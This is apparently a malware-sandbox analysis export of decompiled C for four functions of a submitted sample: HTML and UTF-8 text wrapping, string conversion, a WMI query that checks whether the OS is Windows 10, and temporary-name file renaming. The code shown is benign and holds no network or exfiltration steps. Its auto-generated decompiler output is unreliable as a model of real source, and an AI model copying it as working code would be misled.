Instruction ID: 9f4e71aea956ed96c505ff063995b46e1b665888cb2d0f10455195b4badd54e2
Opcode Fuzzy Hash: 7456f86d3bcaeea58f6eef6c6329cc9127fbdced033eba880951282137553ca7
Instruction Fuzzy Hash: 7A4118F2D08344BAEF30E7749E82FEEB7ACAF55340F004455FA45A7182D774AA888721

Uniqueness

Uniqueness Score: -1.00%

Function 00A49711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126
memoryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00A49711(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				void* _t29;
				intOrPtr* _t36;
				void* _t43;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t68;
				long _t70;
				void* _t72;
				void* _t73;

				_t58 = __edx;
				_t42 = _t43;
				if( *((intOrPtr*)(_t43 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t72 + 8) =  *(_t72 + 8) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t72 + 0x18));
				 *((char*)(_t72 + 0x13)) = E00A495AA(_t60);
				_push(0x200 + E00A53E13(_t60) * 2);
				_t24 = E00A53E33(_t43);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00A56066(_t64, L"<html>");
				E00A57686(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00A57686(_t64, L"utf-8\"></head>");
				_t73 = _t72 + 0x18;
				_t68 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00A41FDD(_t77, _t68, L"<html>", 6);
					 *((char*)(_t73 + 0x12)) = _t29 == 0;
					if(_t29 == 0) {
						_t60 = _t68 + 0xc;
					}
					E00A57686(_t64, _t60);
					if( *((char*)(_t73 + 0x1a)) == 0) {
						E00A57686(_t64, L"</html>");
					}
					_t81 =  *((char*)(_t73 + 0x13));
					if( *((char*)(_t73 + 0x13)) == 0) {
						_push(_t64);
						_t64 = E00A49955(_t58, _t81);
					}
					_t70 = 9 + E00A53E13(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t70);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t70 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00A53E2E(_t64);
					_t24 =  *0xa93180(_t62, 1, _t73 + 0x14);
					if(_t24 >= 0) {
						E00A495EB( *((intOrPtr*)(_t42 + 0x10)));
						_t36 =  *((intOrPtr*)(_t73 + 0x10));
						 *0xa63278(_t36,  *((intOrPtr*)(_t73 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t68 = _t68 + 2;
					_t77 =  *_t68 - _t28;
				} while ( *_t68 == _t28);
				goto L4;
			}

0x00a49711
0x00a49714
0x00a4971a
0x00a4985f
0x00a4985f
0x00a49720
0x00a49727
0x00a49732
0x00a49742
0x00a49743
0x00a49748
0x00a4974e
0x00a4985a
0x00000000
0x00a4985b
0x00a4975b
0x00a49766
0x00a49771
0x00a49776
0x00a49779
0x00a4977d
0x00a49781
0x00a4978c
0x00a49794
0x00a4979b
0x00a497a2
0x00a497a4
0x00a497a4
0x00a497a9
0x00a497b5
0x00a497bd
0x00a497c3
0x00a497c4
0x00a497c9
0x00a497cb
0x00a497d3
0x00a497d3
0x00a497df
0x00a497eb
0x00a497ef
0x00a497f9
0x00a4980e
0x00a4981b
0x00a49810
0x00a49810
0x00a49815
0x00a49815
0x00a4980e
0x00a4981f
0x00a4982d
0x00a49836
0x00a49841
0x00a49846
0x00a49852
0x00a49858
0x00a49858
0x00000000
0x00000000
0x00000000
0x00000000
0x00a49783
0x00a49783
0x00a49783
0x00a49786
0x00a49786
0x00000000

APIs

_wcslen.LIBCMT ref: 00A49736
_wcslen.LIBCMT ref: 00A497D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00A497E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A49806

Strings

<html>, xrefs: 00A49755, 00A4978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00A49760
utf-8"></head>, xrefs: 00A4976B
</html>, xrefs: 00A497B7

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: a3ee4e78f08b08f627bbbd39d0de2717c737a81fc2ede8c08fce0d8f8fc55fa6
Instruction ID: 0ae3ec852b6ee2ae0020a28fba334d9a6a731bc7a37926fa4da0ce0f8105bf92
Opcode Fuzzy Hash: a3ee4e78f08b08f627bbbd39d0de2717c737a81fc2ede8c08fce0d8f8fc55fa6
Instruction Fuzzy Hash: 1C3128365083017AEB25AF749C06F6F77E8AFC2321F14051EF901961D2EB749A1983A6

Uniqueness

Uniqueness Score: -1.00%

Function 00A4FD10 Relevance: 13.7, APIs: 9, Instructions: 154
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00A4FD10(void* __ebx, char* __edx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				intOrPtr _v60;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t38;
				void* _t49;
				short* _t50;
				int _t52;
				int _t53;
				char* _t58;
				int _t59;
				void* _t60;
				char* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t69;
				intOrPtr _t70;
				int _t71;
				intOrPtr* _t72;
				void* _t74;
				short* _t75;
				void* _t78;
				signed int _t79;
				void* _t81;
				short* _t82;

				_t69 = __edx;
				_push(0xfffffffe);
				_push(0xa6c130);
				_push(E00A52900);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x18;
				_t30 =  *0xa6e7ac; // 0xa7a040ce
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t79;
				_v32 = _t31;
				_push(__ebx);
				_push(_t75);
				_push(_t71);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t82;
				_t58 = _a4;
				if(_t58 != 0) {
					_t61 = _t58;
					_t69 =  &(_t61[1]);
					do {
						_t33 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t33 != 0);
					_t62 = _t61 - _t69;
					_t34 = _t62 + 1;
					_v44 = _t34;
					if(_t34 > 0x7fffffff) {
						L17:
						E00A4FCF0(0x80070057);
						goto L18;
					} else {
						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
						_v40 = _t71;
						if(_t71 == 0) {
							L18:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E00A4FCF0(_t36);
							goto L21;
						} else {
							_v8 = 0;
							_t49 = _t71 + _t71;
							if(_t71 >= 0x1000) {
								_push(_t49);
								_t50 = E00A53E33(_t62);
								_t82 =  &(_t82[2]);
								_t75 = _t50;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							} else {
								E00A62010(_t49);
								_v28 = _t82;
								_t75 = _t82;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							}
							if(_t75 == 0) {
								L16:
								E00A4FCF0(0x8007000e);
								goto L17;
							} else {
								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
								if(_t52 == 0) {
									L21:
									if(_t71 >= 0x1000) {
										L00A53E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									E00A4FCF0(_t38);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t79);
									_t70 = _v60;
									_push(_t71);
									_t72 = _t62;
									 *_t72 = 0xa656f8;
									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
									_t63 =  *((intOrPtr*)(_t70 + 8));
									 *((intOrPtr*)(_t72 + 8)) = _t63;
									 *(_t72 + 0xc) = 0;
									if(_t63 != 0) {
										 *0xa63278(_t63, _t75);
										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
									}
									return _t72;
								} else {
									__imp__#2(_t75);
									_t59 = _t52;
									if(_t71 >= 0x1000) {
										L00A53E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									if(_t59 == 0) {
										goto L16;
									} else {
										_t53 = _t59;
										goto L2;
									}
								}
							}
						}
					}
				} else {
					_t53 = 0;
					L2:
					 *[fs:0x0] = _v20;
					_pop(_t74);
					_pop(_t78);
					_pop(_t60);
					return E00A4FBBC(_t53, _t60, _v32 ^ _t79, _t69, _t74, _t78);
				}
			}

0x00a4fd10
0x00a4fd13
0x00a4fd15
0x00a4fd1a
0x00a4fd25
0x00a4fd26
0x00a4fd29
0x00a4fd2e
0x00a4fd31
0x00a4fd33
0x00a4fd36
0x00a4fd37
0x00a4fd38
0x00a4fd39
0x00a4fd3d
0x00a4fd43
0x00a4fd46
0x00a4fd4b
0x00a4fd70
0x00a4fd72
0x00a4fd75
0x00a4fd75
0x00a4fd77
0x00a4fd78
0x00a4fd7c
0x00a4fd7e
0x00a4fd81
0x00a4fd89
0x00a4fe4d
0x00a4fe52
0x00000000
0x00a4fd8f
0x00a4fd9f
0x00a4fda1
0x00a4fda6
0x00a4fe57
0x00a4fe57
0x00a4fe5f
0x00a4fe64
0x00a4fe64
0x00a4fe6a
0x00000000
0x00a4fdac
0x00a4fdac
0x00a4fdb3
0x00a4fdbc
0x00a4fdd4
0x00a4fdd5
0x00a4fdda
0x00a4fddd
0x00a4fddf
0x00a4fde2
0x00a4fdbe
0x00a4fdbe
0x00a4fdc3
0x00a4fdc6
0x00a4fdc8
0x00a4fdcb
0x00a4fdcb
0x00a4fe08
0x00a4fe43
0x00a4fe48
0x00000000
0x00a4fe0a
0x00a4fe14
0x00a4fe1c
0x00a4fe6f
0x00a4fe75
0x00a4fe78
0x00a4fe7d
0x00a4fe7d
0x00a4fe80
0x00a4fe88
0x00a4fe8d
0x00a4fe8d
0x00a4fe93
0x00a4fe98
0x00a4fe99
0x00a4fe9a
0x00a4fe9b
0x00a4fe9c
0x00a4fe9d
0x00a4fe9e
0x00a4fe9f
0x00a4fea0
0x00a4fea3
0x00a4fea6
0x00a4fea7
0x00a4fea9
0x00a4feb2
0x00a4feb5
0x00a4feb8
0x00a4febb
0x00a4fec4
0x00a4fecf
0x00a4fed5
0x00a4fed7
0x00a4fedc
0x00a4fe1e
0x00a4fe1f
0x00a4fe25
0x00a4fe2d
0x00a4fe30
0x00a4fe35
0x00a4fe35
0x00a4fe3a
0x00000000
0x00a4fe3c
0x00a4fe3c
0x00000000
0x00a4fe3c
0x00a4fe3a
0x00a4fe1c
0x00a4fe08
0x00a4fda6
0x00a4fd4d
0x00a4fd4d
0x00a4fd4f
0x00a4fd55
0x00a4fd5d
0x00a4fd5e
0x00a4fd5f
0x00a4fd6d
0x00a4fd6d

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A7A040CE,00000001,00000000,00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE14
SysAllocString.OLEAUT32(00000000), ref: 00A4FE1F
_com_issue_error.COMSUPP ref: 00A4FE48
_com_issue_error.COMSUPP ref: 00A4FE52
GetLastError.KERNEL32(80070057,A7A040CE,00000001,00000000,00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE57
_com_issue_error.COMSUPP ref: 00A4FE6A
GetLastError.KERNEL32(00000000,?,?,00A3AF6C,ROOT\CIMV2), ref: 00A4FE80
_com_issue_error.COMSUPP ref: 00A4FE93

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 177339890d895fde9298180e3c7bf46f64ab01bd3b9df25a8cbb156d97428097
Instruction ID: e44c5cd9afb00996828559c03f3766ab36589073f4215121049ba4315d3d6ffa
Opcode Fuzzy Hash: 177339890d895fde9298180e3c7bf46f64ab01bd3b9df25a8cbb156d97428097
Instruction Fuzzy Hash: B1410876A00219AFDB10DFA8CC46BAEBBF8FB84711F204239F915E7291D7749901C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A3AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00A3AF24() {
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				intOrPtr* _t67;
				signed char _t70;
				intOrPtr* _t72;
				signed char** _t75;
				signed char** _t76;
				signed char* _t77;
				intOrPtr* _t78;
				void* _t80;
				signed char _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				signed char _t92;
				signed char _t98;
				signed char _t105;
				signed char _t108;
				signed char* _t118;
				signed char _t119;
				signed char _t127;
				signed char _t139;
				void* _t147;
				void* _t149;
				void* _t155;
				void* _t162;

				E00A4EB78(0xa62919, _t162);
				_push(_t162 - 0x14);
				_push(0xa6574c);
				_t105 = 0;
				_push(1);
				_push(0);
				_push(0xa6581c);
				 *((intOrPtr*)(_t162 - 0x14)) = 0;
				if( *0xa93188() >= 0) {
					_push(L"ROOT\\CIMV2");
					 *((intOrPtr*)(_t162 - 0x10)) = 0;
					_t63 =  *((intOrPtr*)(E00A3AE2D(_t162 - 0x20)));
					 *(_t162 - 4) = 0;
					if(_t63 == 0) {
						_t108 = 0;
					} else {
						_t108 =  *_t63;
					}
					_t64 =  *((intOrPtr*)(_t162 - 0x14));
					 *0xa63278(_t64, _t108, _t105, _t105, _t105, _t105, _t105, _t105, _t162 - 0x10, _t147);
					_t66 =  *((intOrPtr*)( *_t64 + 0xc))();
					 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
					_t149 = _t66;
					_t110 =  *(_t162 - 0x20);
					if( *(_t162 - 0x20) != 0) {
						E00A3AEF6(_t110);
					}
					if(_t149 < 0) {
						L21:
						_t67 =  *((intOrPtr*)(_t162 - 0x14));
						 *0xa63278(_t67);
						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))();
						_t70 = 0;
					} else {
						_push(_t105);
						_push(_t105);
						_push(3);
						_push(3);
						_push(_t105);
						_push(_t105);
						_push(0xa);
						_push( *((intOrPtr*)(_t162 - 0x10)));
						if( *0xa93184() < 0) {
							L20:
							_t72 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xa63278(_t72);
							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
							goto L21;
						} else {
							_push("SELECT * FROM Win32_OperatingSystem");
							 *(_t162 - 0x18) = _t105;
							_t75 = E00A3ADDB(_t162 - 0x28);
							_push("WQL");
							 *(_t162 - 4) = 1;
							_t76 = E00A3ADDB(_t162 - 0x20);
							_t118 =  *_t75;
							 *(_t162 - 4) = 2;
							if(_t118 == 0) {
								_t139 = _t105;
							} else {
								_t139 =  *_t118;
							}
							_t77 =  *_t76;
							if(_t77 == 0) {
								_t119 = _t105;
							} else {
								_t119 =  *_t77;
							}
							_t78 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xa63278(_t78, _t119, _t139, 0x30, _t105, _t162 - 0x18);
							_t80 =  *((intOrPtr*)( *_t78 + 0x50))();
							_t121 =  *(_t162 - 0x20);
							_t155 = _t80;
							if( *(_t162 - 0x20) != 0) {
								E00A3AEF6(_t121);
								 *(_t162 - 0x20) = _t105;
							}
							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
							_t122 =  *((intOrPtr*)(_t162 - 0x28));
							if( *((intOrPtr*)(_t162 - 0x28)) != 0) {
								E00A3AEF6(_t122);
							}
							if(_t155 >= 0) {
								_t81 =  *(_t162 - 0x18);
								 *(_t162 - 0x1c) = _t105;
								 *(_t162 - 0x24) = _t105;
								if(_t81 != 0) {
									while(1) {
										 *0xa63278(_t81, 0xffffffff, 1, _t162 - 0x1c, _t162 - 0x24);
										 *((intOrPtr*)( *_t81 + 0x10))();
										if( *(_t162 - 0x24) == 0) {
											goto L26;
										}
										_t92 =  *(_t162 - 0x1c);
										 *0xa63278(_t92, L"Name", 0, _t162 - 0x38, 0, 0);
										 *((intOrPtr*)( *_t92 + 0x10))();
										_t105 = _t105 | E00A523F9( *((intOrPtr*)( *_t92 + 0x10))) & 0xffffff00 | _t95 != 0x00000000;
										__imp__#9(_t162 - 0x38,  *((intOrPtr*)(_t162 - 0x30)), L"Windows 10");
										_t98 =  *(_t162 - 0x1c);
										 *0xa63278(_t98);
										 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
										_t81 =  *(_t162 - 0x18);
										if(_t81 != 0) {
											continue;
										}
										goto L26;
									}
								}
								L26:
								_t82 =  *((intOrPtr*)(_t162 - 0x10));
								 *0xa63278(_t82);
								 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))();
								_t85 =  *((intOrPtr*)(_t162 - 0x14));
								 *0xa63278(_t85);
								 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
								_t127 =  *(_t162 - 0x18);
								 *0xa63278(_t127);
								 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))();
								_t70 = _t105;
							} else {
								goto L20;
							}
						}
					}
				} else {
					_t70 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
				return _t70;
			}

0x00a3af29
0x00a3af38
0x00a3af39
0x00a3af3f
0x00a3af41
0x00a3af42
0x00a3af43
0x00a3af48
0x00a3af53
0x00a3af5c
0x00a3af64
0x00a3af6c
0x00a3af6e
0x00a3af73
0x00a3af79
0x00a3af75
0x00a3af75
0x00a3af75
0x00a3af7b
0x00a3af90
0x00a3af96
0x00a3af99
0x00a3af9d
0x00a3af9f
0x00a3afa4
0x00a3afa6
0x00a3afa6
0x00a3afad
0x00a3b05b
0x00a3b05b
0x00a3b066
0x00a3b06c
0x00a3b06e
0x00a3afb3
0x00a3afb3
0x00a3afb4
0x00a3afb5
0x00a3afb7
0x00a3afb9
0x00a3afba
0x00a3afbb
0x00a3afbd
0x00a3afc8
0x00a3b048
0x00a3b048
0x00a3b053
0x00a3b059
0x00000000
0x00a3afca
0x00a3afca
0x00a3afd2
0x00a3afd5
0x00a3afdc
0x00a3afe4
0x00a3afe7
0x00a3afec
0x00a3afee
0x00a3aff4
0x00a3affa
0x00a3aff6
0x00a3aff6
0x00a3aff6
0x00a3affc
0x00a3b000
0x00a3b006
0x00a3b002
0x00a3b002
0x00a3b002
0x00a3b008
0x00a3b01a
0x00a3b020
0x00a3b023
0x00a3b026
0x00a3b02a
0x00a3b02c
0x00a3b031
0x00a3b031
0x00a3b034
0x00a3b038
0x00a3b03d
0x00a3b03f
0x00a3b03f
0x00a3b046
0x00a3b075
0x00a3b078
0x00a3b07b
0x00a3b080
0x00a3b084
0x00a3b096
0x00a3b09c
0x00a3b0a2
0x00000000
0x00000000
0x00a3b0a4
0x00a3b0b9
0x00a3b0bf
0x00a3b0d5
0x00a3b0dc
0x00a3b0e2
0x00a3b0ed
0x00a3b0f3
0x00a3b0f5
0x00a3b0fa
0x00000000
0x00000000
0x00000000
0x00a3b0fa
0x00a3b084
0x00a3b0fc
0x00a3b0fc
0x00a3b107
0x00a3b10d
0x00a3b10f
0x00a3b11a
0x00a3b120
0x00a3b122
0x00a3b12d
0x00a3b133
0x00a3b135
0x00000000
0x00000000
0x00000000
0x00a3b046
0x00a3afc8
0x00a3af55
0x00a3af55
0x00a3af55
0x00a3b13d
0x00a3b145

APIs

__EH_prolog.LIBCMT ref: 00A3AF29

Strings

Name, xrefs: 00A3B0B0
ROOT\CIMV2, xrefs: 00A3AF5C
SELECT * FROM Win32_OperatingSystem, xrefs: 00A3AFCA
Windows 10, xrefs: 00A3B0C2
WQL, xrefs: 00A3AFDC

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 71b1125dae4f09dbc75a2b76d1f99774474c940d3a752355a9a9aca86abbdf19
Instruction ID: 05548780db1321f499a5b51a6f1adb6e34121a383311c0a4e06b53c77f8e2467
Opcode Fuzzy Hash: 71b1125dae4f09dbc75a2b76d1f99774474c940d3a752355a9a9aca86abbdf19
Instruction Fuzzy Hash: 9A716971A00229AFDF14DFA4CC959AEB7B9FF89310F140559F512A72A0CB70AE02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A39382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00A39382() {
				void* _t32;
				short _t33;
				long _t35;
				void* _t40;
				short _t42;
				void* _t66;
				intOrPtr _t69;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E00A4EB78(0xa628b1, _t84);
				E00A4EC50(0x503c);
				_t82 =  *(_t84 + 8);
				_t32 = _t84 - 0x4048;
				__imp__GetLongPathNameW(_t82, _t32, 0x800, _t76, _t81, _t66);
				if(_t32 == 0 || _t32 >= 0x800) {
					L20:
					_t33 = 0;
					__eflags = 0;
				} else {
					_t35 = GetShortPathNameW(_t82, _t84 - 0x5048, 0x800);
					if(_t35 == 0) {
						goto L20;
					} else {
						_t91 = _t35 - 0x800;
						if(_t35 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E00A3C29A(_t91, _t84 - 0x4048);
							_t78 = E00A3C29A(_t91, _t84 - 0x5048);
							_t69 = 0;
							if( *_t39 == 0) {
								goto L20;
							} else {
								_t40 = E00A41FBB( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t40;
								if(_t40 == 0) {
									goto L20;
								} else {
									_t42 = E00A41FBB(E00A3C29A(_t93, _t82), _t78);
									if(_t42 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t42;
										_t79 = 0;
										while(1) {
											_t95 = _t42;
											if(_t42 != 0) {
												break;
											}
											E00A40602(_t84 - 0x1010, _t82, 0x800);
											E00A34092(E00A3C29A(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E00A3A231(_t84 - 0x1010) == 0) {
												_t42 =  *(_t84 - 0x1010);
											} else {
												_t42 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t42;
												if(_t42 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00A40602(_t84 - 0x3048, _t82, 0x800);
										_push(0x800);
										E00A3C310(_t98, _t84 - 0x3048,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3048, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00A39556(_t84 - 0x2048);
											 *((intOrPtr*)(_t84 - 4)) = _t69;
											if(E00A3A231(_t82) == 0) {
												_t69 = E00A3966E(_t84 - 0x2048, _t82, 0x12);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3048);
											if(_t69 != 0) {
												E00A39620(_t84 - 0x2048);
												E00A3974E(_t84 - 0x2048);
											}
											E00A3959A(_t84 - 0x2048);
											_t33 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t33;
			}

0x00a39387
0x00a39391
0x00a39398
0x00a3939b
0x00a393aa
0x00a393b2
0x00a39543
0x00a39543
0x00a39543
0x00a393c0
0x00a393c9
0x00a393d1
0x00000000
0x00a393d7
0x00a393d7
0x00a393d9
0x00000000
0x00a393df
0x00a393eb
0x00a393fa
0x00a393fc
0x00a39401
0x00000000
0x00a39407
0x00a3940b
0x00a39410
0x00a39412
0x00000000
0x00a39418
0x00a39420
0x00a39427
0x00000000
0x00a3942d
0x00a3942d
0x00a39434
0x00a39436
0x00a39436
0x00a39439
0x00000000
0x00000000
0x00a39448
0x00a39465
0x00a3946a
0x00a3947b
0x00a39488
0x00a3947d
0x00a3947d
0x00a3947f
0x00a3947f
0x00a3948f
0x00a39498
0x00000000
0x00a3949a
0x00a3949a
0x00a3949d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3949d
0x00000000
0x00a39498
0x00a394b1
0x00a394b6
0x00a394c1
0x00a394dc
0x00000000
0x00a394de
0x00a394e4
0x00a394ea
0x00a394f4
0x00a39504
0x00a39504
0x00a39514
0x00a3951c
0x00a39524
0x00a3952f
0x00a3952f
0x00a3953a
0x00a3953f
0x00a3953f
0x00a394dc
0x00a39427
0x00a39412
0x00a39401
0x00a393d9
0x00a393d1
0x00a39545
0x00a3954b
0x00a39553

APIs

__EH_prolog.LIBCMT ref: 00A39387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A393AA
GetShortPathNameW.KERNEL32 ref: 00A393C9

Part of subcall function 00A3C29A: _wcslen.LIBCMT ref: 00A3C2A2

Part of subcall function 00A41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00A3C116,00000000,.exe,?,?,00000800,?,?,?,00A48E3C), ref: 00A41FD1

_swprintf.LIBCMT ref: 00A39465

Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5

MoveFileW.KERNEL32(?,?), ref: 00A394D4
MoveFileW.KERNEL32(?,?), ref: 00A39514

Strings

rtmp%d, xrefs: 00A3944E

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 90cf027c9e869ac3807bbc9e50f26cb6aafecec9da6342963bfaae5851dc16f0
Instruction ID: d0d863546a1609c6226a3f7bde7da9ed506e1a8be3c19d8c5a124c662b3dd918
Opcode Fuzzy Hash: 90cf027c9e869ac3807bbc9e50f26cb6aafecec9da6342963bfaae5851dc16f0
